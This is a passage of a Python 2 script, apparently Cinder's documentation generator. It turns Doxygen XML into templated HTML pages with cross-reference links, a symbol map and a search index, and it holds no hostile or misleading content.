typedef_obj = parse_member_definition(bs4, member)
typedefs.append(typedef_obj)
file_data.typedefs = typedefs
# ci prefix / description --------------------------- #
# if the group has a prefix, add it here
if group_def.prefix_content is not None:
file_data.prefix = group_def.prefix_content
# # enumerations -------------------------------------- #
# enumerations = []
# for e in tree.findall(r"compounddef/sectiondef/memberdef[@kind='enum']"):
# member_obj = parse_enum(bs4, e)
# enumerations.append(member_obj)
# file_data.enumerations = enumerations
# public member Functions --------------------------- #
public_fns = []
public_static_fns = []
for memberFn in tree.findall(r'compounddef/sectiondef/memberdef[@kind="function"][@prot="public"]'):
function_obj = parse_function(bs4, memberFn, group_name)
is_static = memberFn.attrib["static"]
if is_static == 'yes':
public_static_fns.append(function_obj)
else:
public_fns.append(function_obj)
file_data.public_functions = public_fns
file_data.public_static_functions = public_static_fns
if group_def:
file_data.search_tags = group_def.tags
return file_data
def process_html_file(in_path, out_path):
""" Parses an html file.
- Adds template around the html
- Copy original css and js links into new html
- Save html in destination dir
"""
# log_progress('Processing file: ' + str(in_path))
print 'Processing file: ' + str(in_path)
# relative path in relation to the in_path (htmlsrc/)
local_rel_path = os.path.relpath(in_path, HTML_SOURCE_PATH)
# directory name of the path
in_dir = os.path.dirname(in_path)
# file name
in_file_name = os.path.basename(in_path)
# skip if it starts with "_", which means that it's not a first class citizen file and is supplemental
if in_file_name.startswith("_"):
return
# get common data for the file
file_data = HtmlFileData(in_path)
# searchable by default
is_searchable = True
# tags for search engine
search_tags = []
# selected section of the website
section = ""
# parse guide config (if present in current directory)
# this determines which function is used to generate dynamic page, which template to use, etc
config_data = parse_config(in_dir, in_file_name)
if config_data:
# add search tags
for k in config_data.keywords:
search_tags.append(k)
# plug in subnav data
file_data.pagenav = config_data.pagenav
# get correct template for the type of file
template = config.HTML_TEMPLATE
body_class = "default"
if in_path.find("htmlsrc" + os.sep + "index.html") > -1:
template = config.HOME_TEMPLATE
is_searchable = False
body_class = "section_home"
section = "home"
elif in_path.find("reference"+os.sep) > -1:
template = config.REFERENCE_TEMPLATE
body_class = "reference"
section = "reference"
elif in_path.find("guides"+os.sep) > -1:
template = config.GUIDE_TEMPLATE
body_class = "guide"
section = "guides"
# fill content ----------------------------------------
# get source file body content
orig_html = generate_bs4(in_path)
# extract original scripts to append later
orig_scripts = []
for x in orig_html.findAll("script"):
orig_scripts.append(x.extract())
orig_links = []
# get title
if orig_html.head:
if orig_html.head.title:
file_data.title = orig_html.head.title.text
for x in orig_html.findAll('link', rel="stylesheet"):
orig_links.append(x.extract())
# if there is a specific page that needs some special dynamic content, this is where we do it
insert_div_id = ""
dynamic_div = gen_tag(orig_html, "body")
for data in config.DYNAMIC_PAGES_CONFIG:
if "reference_html" in data and data["reference_html"] == local_rel_path:
is_searchable = bool(data["searchable"])
markup = generate_dynamic_markup(data)
for content in markup.body.contents:
dynamic_div.append(content)
insert_div_id = data["element_id"]
if "section" in data:
section = data["section"]
# inject dynamic content into orig_html
if insert_div_id:
insert_el = orig_html.find(id=insert_div_id)
inject_html(dynamic_div, insert_el, in_path, out_path)
# get body content out of bs4 and plug into file_data
body_content = get_body_content(orig_html)
file_data.html_content = body_content
file_content = file_data.get_content()
# render file template
bs4 = render_template(template, file_content)
update_links_abs(bs4, os.path.dirname(in_path))
content_dict = {'page_title': file_content["title"], 'main_content': get_body_content(bs4), 'body_class': body_class, str("section_" + section): "true"}
# append file meta
content_dict.update(file_meta.copy())
# plug everything into the master template
bs4 = render_template(os.path.join(TEMPLATE_PATH, "master-template.mustache"), content_dict)
# make sure all links are absolute
update_links_abs(bs4, TEMPLATE_PATH)
# now all links should be relative to out path
update_links(bs4, TEMPLATE_PATH, in_path, out_path)
if bs4 is None:
log("Error generating file, so skipping: " + in_path, 2)
return
# get list of all the css and js links in the new bs4
link_list = bs4.head.find_all("link")
script_list = bs4.body.find_all("script")
# copy any css paths that may be in the original html and paste into new file
for link in orig_links:
# do not add duplicates
if any(link_item["href"] == link["href"] for link_item in link_list):
continue
if bs4.head:
bs4.head.append(link)
# append original scripts to the end
for script in orig_scripts:
# do not add duplicates
if script.has_attr("src") and any(script_item.has_attr("src") and script_item["src"] == script["src"] for script_item in script_list):
continue
if bs4.body:
bs4.body.append(script)
if orig_html.head:
if bs4.head:
for d in orig_html.head.find_all("ci"):
bs4.head.append(d)
# add ci seealso tags from config to bs4 head if it's the first in a group
if config_data and config_data.order == 0:
seealso_label = config_data.see_also_label
for tag in config_data.see_also_tags:
ci_tag = gen_tag(bs4, "ci")
ci_tag.attrs["seealso"] = ""
ci_tag.attrs["label"] = seealso_label
ci_tag.attrs["dox"] = tag
bs4.head.append(ci_tag)
# add tags from the meta keywords tag
for meta_tag in orig_html.head.findAll(attrs={"name": "keywords"}):
for keyword in meta_tag['content'].split(','):
search_tags.append(keyword.encode('utf-8').strip())
# look for any meta 'group' tags to tell us that it's part of a group that will need nav
for meta_tag in orig_html.head.findAll(attrs={"name": "group"}):
if meta_tag['content']:
file_data.group = meta_tag['content']
# link up all ci tags
for tag in bs4.find_all('ci'):
process_ci_tag(bs4, tag, in_path, out_path)
if in_path.find("_docs/") < 0:
if is_searchable:
link_path = gen_rel_link_tag(bs4, "", out_path, HTML_SOURCE_PATH, HTML_DEST_PATH)["href"]
add_to_search_index(bs4, link_path, file_data.kind_explicit, search_tags)
state.add_html_file(file_data)
file_data.path = out_path
write_html(bs4, out_path)
def parse_config(path, file_name):
# if "config.json" exists in path directory
config_path = os.path.join(path, "config.json")
if os.path.exists(config_path):
# load and turn into GuideConfig object
with open(config_path) as data_file:
try:
config_data = json.load(data_file)
guide_config = GuideConfig(config_data, path, file_name)
except Exception as e:
log(str(e), 2)
raise
return guide_config
else:
return None
# ============================================================================================== Dynamic Page Generation
def generate_dynamic_markup(ref_data):
# find template if it exists
ref_id = ref_data["id"]
if ref_id == "glm":
return_markup = generate_glm_reference()
elif ref_id == "namespaces":
return_markup = generate_namespace_data()
elif ref_id == "classes":
return_markup = generate_class_list_data()
else:
return_markup = "NOTHING FOUND"
log("No rules for generating dynamic content for id'" + ref_id + "' was found", 1)
# plug data into template (if it exists)
template_path = os.path.join(TEMPLATE_PATH, ref_data["template"])
markup = render_template(template_path, return_markup)
return markup
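# Illustrative sketch of a config.DYNAMIC_PAGES_CONFIG entry as consumed by
# generate_dynamic_markup() and process_html_file(); only the keys below are
# read by this script, the values are hypothetical:
#   {
#       "id": "classes",                             # selects the generator above
#       "reference_html": "reference/classes.html",  # page that receives the markup
#       "element_id": "class_list",                  # id of the element to inject into
#       "template": "class-list.mustache",           # template rendered with the data
#       "searchable": False,
#       "section": "reference"
#   }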
def generate_glm_reference():
glm_group_data = {
"groups": []
}
# add group data to glm reference data object
for group_name in g_symbolMap.groups:
group = g_symbolMap.find_group(group_name)
group_data = {}
group_data["name"] = group.title
group_data["path"] = group.path
group_data["description"] = group.description
subgroups = []
if len(group.subgroups) > 0:
for subgroup in group.subgroups:
subgroup_data = {}
subgroup_data["name"] = subgroup.title
subgroup_data["path"] = subgroup.path
subgroup_data["description"] = subgroup.description
subgroups.append(subgroup_data)
group_data["subgroups"] = subgroups
glm_group_data["groups"].append(group_data)
return glm_group_data
def generate_namespace_data():
ns_data = {
"namespaces": []
}
namespaces = g_symbolMap.get_whitelisted_namespaces()
for ns in namespaces:
ns = {
"link": ns.path,
"label": ns.name
}
ns_data["namespaces"].append(ns)
return ns_data
def generate_class_list_data():
classlist_data = {
"classes": []
}
classes = g_symbolMap.get_ordered_class_list()
for c in classes:
class_data = {
"link": c.path,
"label": c.name
}
classlist_data["classes"].append(class_data)
return classlist_data
# ===================================================================================================== CI Tag Functions
def process_ci_tag(bs4, tag, in_path, out_path):
"""
Depending on the attributes of the ci tag, do something different
:param bs4: The current beautiful soup instance
:param tag: The ci tag to process
:param in_path: The path to the current processed html file
:param out_path: The save path for the processed html file
:return:
"""
if tag.has_attr("seealso"):
process_ci_seealso_tag(bs4, tag, out_path)
elif tag.has_attr("prefix"):
process_ci_prefix_tag(bs4, tag, in_path)
# elif tag.has_attr("source"):
# process_ci_source_tag(bs4, tag)
else:
replace_ci_tag(bs4, tag, in_path, out_path)
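# Hedged examples of the <ci> tag forms this dispatcher handles, based on the
# attributes checked above (symbol names and labels here are illustrative only):
#   <ci>Surface</ci>                                   -> replaced with a link to the symbol
#   <ci dox="cinder::gl::Texture">Texture</ci>         -> looked up via the "dox" attribute
#   <ci seealso="" label="Guide" dox="SomeClass"></ci> -> adds a related link to that class
#   <ci prefix="">...html content...</ci>              -> stored as class prefix content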
def replace_ci_tag(bs4, link, in_path, out_path):
ref_obj = find_ci_tag_ref(link)
if ref_obj:
ref_location = path_join(HTML_DEST_PATH, ref_obj.path)
new_link = gen_rel_link_tag(bs4, link.contents, ref_location, in_path, out_path)
# transfer tag classes to new tag
tag_classes = link["class"] if link.has_attr("class") else None
if tag_classes:
for c in tag_classes:
add_class_to_tag(new_link, c)
add_class_to_tag(new_link, "ci")
link.replace_with(new_link)
else:
log("Could not find replacement tag for ci tag: " + str(link), 1)
def process_ci_seealso_tag(bs4, tag, out_path):
"""
Processes ci tag that is of 'seealso' type
:param bs4: The active beautiful soup instance
:param tag: the ci tag to find a reference for
:param out_path: the file path
:return: None
"""
ref_obj = find_ci_tag_ref(tag)
# get label attribute value if there is one
if tag.has_attr("label"):
label = tag["label"]
# otherwise use the name of the file as the label
else:
label = get_file_name(out_path)
# link_tag = gen_link_tag(bs4, label, out_path)
link_data = LinkData(out_path.replace("\\", "/"), label)
# if type(ref_obj) is SymbolMap.Class or type(ref_obj) is SymbolMap.Typedef:
if type(ref_obj) is SymbolMap.Class:
ref_obj.add_related_link(link_data)
elif type(ref_obj) is SymbolMap.Namespace:
# find all classes with that namespace and add guide to every one
for class_obj in g_symbolMap.find_classes_in_namespace(ref_obj.name):
class_obj.add_related_link(link_data)
else:
log("Could not find seealso reference for " + str(tag), 1)
def process_ci_prefix_tag(bs4, tag, in_path):
"""
Finds the referenced tag's object, if it exists, and stores the prefix content on the class to be parsed later
:param bs4: The current beautiful soup instance
:param tag: The ci tag with a defined prefix attribute
:param in_path: The path to the prefix content
:return:
"""
in_path = in_path.replace('\\', '/')
in_dir = get_path_dir(in_path)
obj_ref = find_ci_tag_ref(tag)
if obj_ref and type(obj_ref) is SymbolMap.Class:
# get tag content
prefix_content = ""
for c in tag.contents:
content = c.encode("utf-8", errors="replace")
prefix_content += content
# generate bs4 from content and update links as relative from the template path
# could alternatively set the absolute paths of content, which would then be turned into rel paths later
new_bs4 = generate_bs4_from_string(prefix_content)
update_links(new_bs4, in_dir, in_path, TEMPLATE_PATH)
# get updated body content and assign as prefix_content
prefix_content = ""
for c in new_bs4.body:
content = c.encode("utf-8", errors="replace")
prefix_content += content
obj_ref.define_prefix(prefix_content)
# TODO: add ability to replace ci tag with link to github source file
# def process_ci_source_tag(bs4, tag):
# """
# Replace the ci tag with a link to a source file on github
# :param tag: the tag to find a link for
# :return:
# """
# link_title = "LINK TITLE"
# # link_url =
# link_tag = gen_link_tag(bs4, link_title)
def find_ci_tag_ref(link):
# get string to search against
searchstring = ""
if len(link.contents):
searchstring = link.contents[0]
if link.get('dox') is not None:
searchstring = link.get('dox')
ref_obj = None
is_function = searchstring.find("(") > -1 or link.get('kind') == 'function'
if is_function:
arg_string = searchstring[searchstring.find("("):]
if len(arg_string) == 0:
arg_string = "()"
try:
# find function link
if is_function:
fn_obj = g_symbolMap.find_function(searchstring, arg_string)
if fn_obj is not None:
ref_obj = fn_obj
# find enum link
elif link.get('kind') == 'enum':
enum_obj = g_symbolMap.find_enum(searchstring)
if enum_obj is not None:
ref_obj = enum_obj
# find class link
else:
existing_class = g_symbolMap.find_class(searchstring)
if existing_class is not None:
ref_obj = existing_class
else:
count = 0
# try a bunch of other things before giving up
while (ref_obj is None) and count < 3:
if count == 0:
ref_obj = g_symbolMap.find_namespace(searchstring)
elif count == 1:
ref_obj = g_symbolMap.find_function(searchstring)
elif count == 2:
ref_obj = g_symbolMap.find_enum(searchstring)
count += 1
except Exception as e:
log("problem finding ci tag", 1)
log(e.message, 1)
return None
return ref_obj
# ======================================================================================================== Link Updating
def path_join(path, link):
p = path.replace('\\', '/')
l = link.replace('\\', '/')
sep = '/' if not p.endswith('/') else ''
new_link = p + sep + l
return new_link
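# e.g. path_join("html\\classes", "index.html") -> "html/classes/index.html"
# (illustrative paths; backslashes are normalized and a single separator is inserted)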
def get_path_dir(path):
path_parts = path.replace('\\', '/').split('/')
# if it doesn't end with a '/', lop off the last word
if not path.endswith('/'):
in_dir = '/'.join(path_parts[:-1]) + '/'
else:
in_dir = path
return in_dir
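# e.g. (illustrative paths):
#   get_path_dir("htmlsrc/guides/index.html") -> "htmlsrc/guides/"
#   get_path_dir("htmlsrc/guides/")           -> "htmlsrc/guides/"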
def update_links_abs(html, src_path):
"""
Replace all of the relative css, a, script, img and iframe links with absolute links
:param html: The BeautifulSoup instance to update
:param src_path: The path of the file the links live in
:return:
"""
# css links
for link in html.find_all("link"):
if link.has_attr("href"):
link["href"] = update_link_abs(link["href"], src_path)
# a links
for a in html.find_all("a"):
if a.has_attr("href"):
link_href = a["href"]
# if the link is an hpp file, lets link to the github link since we likely don't have it in our docs
if link_href.find(config.GLM_MODULE_CONFIG["source_file_ext"]) > -1:
a["href"] = config.GLM_MODULE_CONFIG["url_prefix"] + a.text
else:
a["href"] = update_link_abs(a["href"], src_path)
# script links
for script in html.find_all("script"):
if script.has_attr("src"):
script["src"] = update_link_abs(script["src"], src_path)
# images
for img in html.find_all("img"):
if img.has_attr("src"):
img["src"] = update_link_abs(img["src"], src_path)
# iframes
for iframe in html.find_all("iframe"):
if iframe.has_attr("src"):
link_src = iframe["src"]
if link_src.startswith('javascript') or link_src.startswith('http'):
continue
new_link = update_link_abs(link_src, src_path)
iframe["src"] = new_link
def relative_url(in_path, link):
"""
Generates a relative url from an absolute destination directory
to an absolute file path
"""
index = 0
SEPARATOR = "/"
d = filter(None, in_path.replace('\\', SEPARATOR).split( SEPARATOR ))
s = filter(None, link.replace('\\', SEPARATOR).split( SEPARATOR ))
# FIND largest substring match
for i, resource in enumerate( d ):
if resource != s[i]:
break
index += 1
# remainder of source
s = s[index:]
backCount = len( d ) - index
path = "../" * backCount
path += SEPARATOR.join( s )
return path
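# A minimal illustration with hypothetical paths: the common prefix "html" is
# dropped, one "../" is emitted for the remaining directory of in_path, and the
# remainder of link is appended:
#   relative_url("html/guides/", "html/classes/Foo.html") -> "../classes/Foo.html"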
def update_link_abs(link, in_path):
"""
Update the given link to point to something relative to the new path
:param link: The link to change
:param in_path: the original path to the file that the link lives in
:return:
"""
if link.startswith("http") or link.startswith("javascript:") or link.startswith("#"):
return link
SEPARATOR = "/"
in_path = in_path.replace('\\', SEPARATOR)
index = 0
backs = 0
# SPLIT the url into a list of path parts
r = in_path.split(SEPARATOR)
r = filter(None, r)
l = link.split(SEPARATOR)
l = filter(None, l)
# FIND largest substring match
for i, resource in enumerate( r ):
if resource != l[i]:
break
index += 1
# FIND the amount of back references
for j, back_ref in enumerate( l ):
if back_ref != "..":
break
backs += 1
if not index:
if backs > 0:
final = SEPARATOR.join(r[:backs*-1]) + SEPARATOR + SEPARATOR.join(l[backs:])
else:
final = SEPARATOR.join(r) + SEPARATOR + SEPARATOR.join(l)
else:
pre = r[:index]
post = l[index:]
final = SEPARATOR.join(pre) + SEPARATOR + SEPARATOR.join(post)
return final
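# Hedged example with hypothetical paths: there is no common prefix between the
# two, and the single ".." back-reference consumes one directory of in_path:
#   update_link_abs("../_assets/style.css", "htmlsrc/guides/") -> "htmlsrc/_assets/style.css"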
def update_links(html, template_path, src_path, save_path):
"""
Replace all of the relative css, a, script, img and iframe links and make them relative to the out path
:param html: The BeautifulSoup instance to update
:param template_path: The path to the template directory
:param src_path: The original path of the file the links live in
:param save_path: The destination path the links should be relative to
:return:
"""
template_path = "/".join(template_path.replace('\\', '/').split('/'))
# css links
for link in html.find_all("link"):
if link.has_attr("href"):
link["href"] = update_link(link["href"], template_path, save_path)
# a links
for a in html.find_all("a"):
if a.has_attr("href"):
link_href = a["href"]
# if the link is an hpp file, lets link to the github link since we likely don't have it in our docs
if link_href.find(config.GLM_MODULE_CONFIG["source_file_ext"]) > -1:
a["href"] = config.GLM_MODULE_CONFIG["url_prefix"] + a.text
else:
a["href"] = update_link(a["href"], template_path, save_path)
# script links
for script in html.find_all("script"):
if script.has_attr("src"):
script["src"] = update_link(script["src"], template_path, save_path)
# images
for img in html.find_all("img"):
if img.has_attr("src"):
img["src"] = update_link(img["src"], template_path, save_path)
# iframes
for iframe in html.find_all("iframe"):
if iframe.has_attr("src"):
link_src = iframe["src"]
# on osx/unix
if os.sep == "/":
if not posixpath.isabs(link_src):
link_src = "/" + link_src
if link_src.startswith('javascript') or link_src.startswith('http'):
continue
# base dir
src_base = src_path.split(BASE_PATH)[1].split(os.sep)[0]
dest_base = save_path.split(BASE_PATH)[1].split(os.sep)[0]
# get link of iframe source and replace in iframe
new_link = update_link(link_src, template_path, save_path)
iframe["src"] = new_link
# define the paths of file to copy and where to copy to
src_file = link_src
dest_file = link_src.replace(src_base, dest_base)
try:
# copy the file as long as the source and destination paths are not identical (a SequenceMatcher ratio of 1.0 means the paths match exactly)
if SM(None, src_file, dest_file).ratio() < 1.0:
shutil.copy2(src_file, dest_file)
except IOError as e:
log("Cannot copy src_file because it doesn't exist: " + src_file, 2)
log(e.strerror, 2)
return
except Exception as e:
log("Cannot copy iframe over because of some other error", 2)
log(str(e), 2)
return
def update_link(link, in_path, out_path):
"""
Update the given link to point to something relative to the new path
:param link: The link to change
:param in_path: the original path to the file that the link lives in
:param out_path: the destination path to make the link relative to
:return:
"""
if link.startswith("http") or link.startswith("javascript:") or link.startswith("#"):
return link
SEPARATOR = '/'
in_path = in_path.replace('\\', SEPARATOR)
out_path = out_path.replace('\\', SEPARATOR)
link = link.replace('\\', SEPARATOR)
base_path = BASE_PATH.replace('\\', SEPARATOR)
# if a relative path, make it absolute
if in_path.find(base_path) < 0:
in_path = base_path + in_path
# get absolute in path
abs_link_path = update_link_abs(link, in_path)
# convert to relative link in relation to the out path
src_base = in_path.split(base_path)[1].split(SEPARATOR)[0] # likely htmlsrc
dest_base = out_path.split(base_path)[1].split(SEPARATOR)[0] # htmlsrc or html
abs_dest = posixpath.dirname(out_path).replace('\\', SEPARATOR)
abs_link = abs_link_path.replace(src_base, dest_base)
# if not posixpath.isabs(abs_link):
# abs_link = "/" + abs_link
rel_link_path = relative_url(abs_dest, abs_link)
return rel_link_path
# =============================================================================================== File Utility Functions
def generate_bs4(file_path):
# tree = None
try:
with open(file_path, "rb") as html_file:
content = html_file.read().decode("utf-8", errors="replace")
new_content = content.encode("utf-8", errors="replace")
# wrap in body tag if none exists
if new_content.find("<body") < 0:
new_content = "<body>" + new_content + "</body>"
log("No body tag found in file: " + file_path)
bs4 = BeautifulSoup(new_content)
return bs4
except Exception as e:
log(e.message, 2)
return None
def generate_bs4_from_string(string):
# make sure it's a unicode object
if type(string) != unicode:
output_string = string.decode("utf-8", errors="replace")
else:
output_string = string
# wrap in body tag if none exists
if string.find("<body") < 0:
output_string = "<body>" + output_string + "</body>"
bs4 = BeautifulSoup(output_string)
return bs4
def get_symbol_to_file_map():
"""
Builds a SymbolMap that maps Cinder symbol names (classes, structs, namespaces, enums, files and groups) to their documentation file paths
"""
log("generating symbol map from tag file", 0, True)
symbol_map = SymbolMap()
# find classes
class_tags = g_tag_xml.findall(r'compound/[@kind="class"]')
for c in class_tags:
class_obj = SymbolMap.Class(c)
name = class_obj.qualifiedName
# skip over blacklisted classes that belong to a blacklisted namespace
if any(name.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
# print "SKIPPING " + name
continue
base_class = class_obj.base
symbol_map.classes[name] = class_obj
# find functions and add to symbol map
members = c.findall(r"member[@kind='function']")
for member in members:
# function_obj = SymbolMap.Function(fn_name, base_class, args, file_path)
function_obj = SymbolMap.Function(member, base_class)
# symbol_map.functions[name + "::" + function_obj.name] = function_obj
symbol_map.add_function(name, function_obj.name, function_obj)
class_obj.add_function(function_obj.name, function_obj)
# print "CLASS: " + name
# if name == "Iter":
# raise
# find enums
for member in c.findall(r"member/[@kind='enumeration']"):
pre = name + "::" if name is not None else ""
enum_name = pre + member.find("name").text
anchor = member.find("anchor").text
path = member.find("anchorfile").text + "#" + anchor
enum_obj = SymbolMap.Enum(enum_name, path)
symbol_map.enums[enum_name] = enum_obj
# find structs
struct_tags = g_tag_xml.findall(r'compound/[@kind="struct"]')
for s in struct_tags:
struct_obj = SymbolMap.Class(s)
name = struct_obj.qualifiedName
base_class = struct_obj.base
# skip over blacklisted classes that belong to a blacklisted namespace
if any(name.find(blacklisted) > -1 for blacklisted in config.CLASS_LIST_BLACKLIST):
log("SKIPPING " + name, 1)
continue
symbol_map.classes[name] = struct_obj
# find functions and add to symbol map
members = s.findall(r"member[@kind='function']")
for member in members:
# fn_name = member.find("name").text
# anchor = member.find("anchor").text
# file_path = member.find("anchorfile").text + "#" + anchor
# args = member.find("argsstring").text if member.find("argsstring") else ""
# function_obj = SymbolMap.Function(fn_name, base_class, args, file_path)
function_obj = SymbolMap.Function(member, base_class)
# symbol_map.functions[name + "::" + function_obj.name] = function_obj
symbol_map.add_function(name, function_obj.name, function_obj)
struct_obj.add_function(function_obj.name, function_obj)
# find namespaces
ns_tags = g_tag_xml.findall(r'compound/[@kind="namespace"]')
for ns in ns_tags:
namespace_name = ns.find('name').text
file_name = ns.find('filename').text
# skip namespaces with '@' in them
if namespace_name.find('@') > -1:
continue
# skip over blacklisted classes that belong to a blacklisted namespace
if config.is_namespace_blacklisted(namespace_name):
log("SKIPPING NAMESPACE: " + namespace_name, 1)
continue
ns_obj = SymbolMap.Namespace(namespace_name, file_name)
symbol_map.namespaces[namespace_name] = ns_obj
# process all typedefs in namespace
typedef_list = add_typedefs(ns.findall(r"member/[@kind='typedef']"), namespace_name, symbol_map)
ns_obj.typedefs = typedef_list
# find enums
for member in ns.findall(r"member/[@kind='enumeration']"):
name = namespace_name + "::" + member.find("name").text
# print "ENUM: " + name
anchor = member.find("anchor").text
path = member.find("anchorfile").text + "#" + anchor
enum_obj = SymbolMap.Enum(name, path)
symbol_map.enums[name] = enum_obj
# find functions and add to symbol map
members = ns.findall(r"member[@kind='function']")
for member in members:
# NOTE: base_class here is left over from the struct loop above; namespace-level functions have no base class
function_obj = SymbolMap.Function(member, base_class)
ns_obj.functionList.append(function_obj)
ns_obj.add_function(function_obj.name, function_obj)
# find files
file_tags = g_tag_xml.findall(r'compound/[@kind="file"]')
for f in file_tags:
name = f.find('name').text
# filePath = f.find('path').text + f.find('filename').text
file_path = f.find('path').text + name
typedefs = []
# find typedefs for each file
for t in f.findall(r'member[@kind="typedef"]'):
td_name = t.find("name").text
type_name = t.find("type").text
type_path = t.find('anchorfile').text + "#" + t.find("anchor").text
typedef = SymbolMap.Typedef(td_name, type_name, type_path)
typedefs.append(typedef)
# print "FILE PATH: " + name + " | " + file_path
symbol_map.files[name] = SymbolMap.File(name, file_path, typedefs)
# find functions for each file
for member in f.findall(r'member[@kind="function"]'):
function_obj = SymbolMap.Function(member, "")
symbol_map.add_function("", function_obj.name, function_obj)
# find groups
group_tags = g_tag_xml.findall(r'compound/[@kind="group"]')
for member in group_tags:
group_obj = SymbolMap.Group(member)
subgroups = member.findall('subgroup')
# hardcode this for now since all groups are part of glm
ns = "glm"
# add subgroup names
if len(subgroups) > 0:
for subgroup in subgroups:
group_obj.subgroup_names.append(subgroup.text)
# find functions and add to symbol map
functions = member.findall(r"member[@kind='function']")
for function in functions:
function_obj = SymbolMap.Function(function, ns)
group_obj.add_function(function_obj.name, function_obj)
symbol_map.add_function(ns, function_obj.name, function_obj)
# find typedefs
typedefs = member.findall(r"member/[@kind='typedef']")
add_typedefs(typedefs, "glm", symbol_map)
symbol_map.groups[group_obj.name] = group_obj
# link up subgroups to parent groups
for group_names in symbol_map.groups:
group_obj = symbol_map.find_group(group_names)
if len(group_obj.subgroup_names) > 0:
# print group.name
for subgroup_name in group_obj.subgroup_names:
subgroup = symbol_map.find_group(subgroup_name)
group_obj.subgroups.append(subgroup)
if len(file_tags) == 0:
log("no compound of type 'file' found in tag file. Check doxygen SHOW_FILES setting.", 1)
return symbol_map
def add_typedefs(typedefs, ns_name, symbol_map):
typedef_list = []
# if ns_name == "cinder::gl"
for typdef in typedefs:
name = typdef.find("name").text
type_name = typdef.find("type").text
full_name = ns_name + "::" + name
shared_from_class = None
if type_name.startswith("class") > 0:
shared_from_class = symbol_map.find_class(type_name.split("class ")[1])
elif type_name.find("shared") > 0:
if type_name.find("class"):
shareds = re.findall(r"std::shared_ptr< (?:class)* *([\w]*) >", type_name)
else:
shareds = re.findall(r"std::shared_ptr< *([\w]*) >", type_name)
if len(shareds) > 0:
base = ns_name + "::" + shareds[0]
shared_from_class = symbol_map.find_class(base)
if not shared_from_class:
# find based on the string in type that's not explicitly a shared_ptr
# such as <type>SurfaceT< uint8_t ></type>
shareds = re.findall(r"([A-Za-z0-9]*)", type_name)
shared_from_class = symbol_map.find_class(shareds[0])
file_path = typdef.find('anchorfile').text + "#" + typdef.find("anchor").text
type_def_obj = SymbolMap.Typedef(name, type_name, file_path)
if shared_from_class is not None and type(shared_from_class) == SymbolMap.Class:
# if shared_from_class is not None:
type_def_obj.sharedFrom = shared_from_class
# let the class know that it has some typedefs associated with it
shared_from_class.add_type_def(type_def_obj)
symbol_map.typedefs[full_name] = type_def_obj
typedef_list.append(type_def_obj)
return typedef_list
def get_file_prefix(file_path):
return os.path.splitext(os.path.basename(file_path))[0]
def get_file_extension(file_path):
return os.path.splitext(os.path.basename(file_path))[1]
def get_file_name(file_path):
return os.path.basename(file_path)
def parse_xml(in_path):
"""
Opens the xml file and turns it into an ETree
:param in_path:
:return:
"""
# print "parse : " + in_path
tree = None
try:
with open(in_path, "rb") as xml_file:
content = xml_file.read().decode("utf-8", errors="replace")
new_content = content.encode("utf-8", errors="replace")
parser = ET.XMLParser(encoding="utf-8")
tree = ET.fromstring(new_content, parser)
except:
exc = sys.exc_info()[0]
log("COULD NOT PARSE FILE: " + in_path, 2)
log(exc, 2)
return tree
def write_html(bs4, save_path):
"""
Writes the html file to disk
:param bs4:
:param save_path:
:return:
"""
# prettify descriptions
for markup in bs4.find_all("div", "description"):
if type(markup) is Tag:
pretty = BeautifulSoup(markup.prettify())
if pretty is not None and markup is not None:
markup.replaceWith(pretty)
# convert entities in code blocks
for c in bs4.find_all("code"):
for child in c.children:
# replaces with escaped code
try:
child_utf = unicode(child).encode("utf-8", errors="replace")
child.replace_with(str(child_utf))
except Exception as e:
log("Writing HTML | " + str(e), 2)
# encode bs4, decode, and then re-encode and write
document = bs4.encode(formatter="html")
document = codecs.decode(document, "utf-8", "xmlcharrefreplace")
if not os.path.exists(os.path.dirname(save_path)):
os.makedirs(os.path.dirname(save_path))
with codecs.open(save_path, "w", "utf-8") as outFile:
outFile.write(document)
def write_search_index():
# save search index to js file
document = "var search_index_data = " + json.dumps(g_search_index).encode('utf-8')
# print document
if not os.path.exists(os.path.dirname(HTML_DEST_PATH + 'search_index.js')):
os.makedirs(os.path.dirname(HTML_DEST_PATH + 'search_index.js'))
with codecs.open(HTML_DEST_PATH + 'search_index.js', "w", "UTF-8") as outFile:
outFile.write(document)
def add_to_search_index(html, save_path, search_type, tags=[]):
"""
Adds the html page to the search index
:param html:
:param save_path:
:param search_type:
:param tags:
:return:
"""
global g_search_index
if not g_search_index:
g_search_index = {"data": []}
# creates new list from tags minus any dupes
search_list = list(set(tags))
search_obj = {"id": None, "title": None, "tags": []}
search_obj["id"] = len(g_search_index["data"])
search_obj["title"] = html.head.find("title").text if html.head.find("title") else ""
search_obj["link"] = save_path
search_obj["tags"] = search_list
search_obj["type"] = search_type
g_search_index["data"].append(search_obj)
def render_template(path, content):
"""
Generates a BeautifulSoup instance from the template and injects content
:param path:
:param content:
:return:
"""
# try:
# renderer = Renderer(file_encoding="utf-8", string_encoding="utf-8", decode_errors="xmlcharrefreplace")
# renderer.search_dirs.append(TEMPLATE_PATH)
# output = renderer.render_path(path, content)
# print content
# print path
# step 1: render content in template
content_renderer = Renderer(file_encoding="utf-8", string_encoding="utf-8", decode_errors="xmlcharrefreplace")
content_renderer.search_dirs.append(TEMPLATE_PATH)
output = content_renderer.render_path(path, content)
# step 2: place rendered content into main template
# - should have the following custom partials:
# - page title (define in object for page templates)
# - page content (rendered page content)
# - any other common partials that may lie outside the basic content area
# loader = Loader()
# template = loader.read("title")
# title_partial = loader.load_name(os.path.join(CLASS_TEMPLATE_DIR, "title"))
# except Exception as exc:
# print "\t**--------------------------------"
# print "\t** Warning: cannot render template"
# print "\t**--------------------------------"
# print exc
# print exc.message
# print(traceback.format_exc())
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print(exc_type, fname, exc_tb.tb_lineno)
#
# if config.BREAK_ON_STOP_ERRORS:
# quit()
# else:
# return
bs4 = generate_bs4_from_string(output)
return bs4
def get_file_type(file_prefix):
"""
Determines the file type based on the file prefix
:param file_prefix: prefix in file name
:return: string indicating the type of file to parse
"""
if is_class_type(file_prefix):
return "class"
elif is_namespace_type(file_prefix):
return "namespace"
elif is_module_type(file_prefix):
return "module"
def is_class_type(class_str):
"""
Tests whether the filename is a class type
:param class_str:
:return: Boolean
"""
if any([class_str.startswith(prefix) for prefix in config.CLASS_FILE_PREFIXES]):
return True
return False
def is_namespace_type(ns_str):
"""
Tests whether the filename is a namespace type
:param ns_str:
:return: Boolean
"""
if any([ns_str.startswith(prefix) for prefix in config.NAMESPACE_FILE_PREFIXES]):
